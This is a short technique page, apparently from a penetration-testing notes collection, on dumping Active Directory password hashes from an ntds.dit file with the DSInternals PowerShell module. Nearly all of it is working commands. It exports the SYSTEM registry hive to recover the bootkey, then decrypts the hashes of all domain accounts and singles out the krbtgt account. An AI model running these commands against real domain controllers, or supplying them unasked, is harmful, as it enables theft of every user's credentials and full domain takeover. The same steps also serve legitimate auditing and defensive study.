# Dumping the contents of ntds.dit files using PowerShell

You'll require the <https://github.com/MichaelGrafnetter/DSInternals> module for this. Instructions on how to install can be found on the github page.&#x20;

## Obtaining the bootkey stored in the SYSTEM hive

This can be done by exporting the SYSTEM hive using reg.exe

```powershell
reg.exe save hklm\system system
```

From there you can retrieve the bootkey using `Get-BootKey`

```powershell
Get-BootKey -SystemHivePath 'D:\Windows\System32\config\SYSTEM'
```

## Dumping the contents of ntds.dit

We then load the DB and decrypt password hashes of all accounts

```powershell
Get-ADDBAccount -All -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"
```

We can also get a single account by specifying its distinguishedName, objectGuid, objectSid or sAMAccountName atribute:

```powershell
Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=Adatum,DC=com' -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"
```

## References

{% embed url="<https://github.com/MichaelGrafnetter/DSInternals>" %}

{% embed url="<https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/>" %}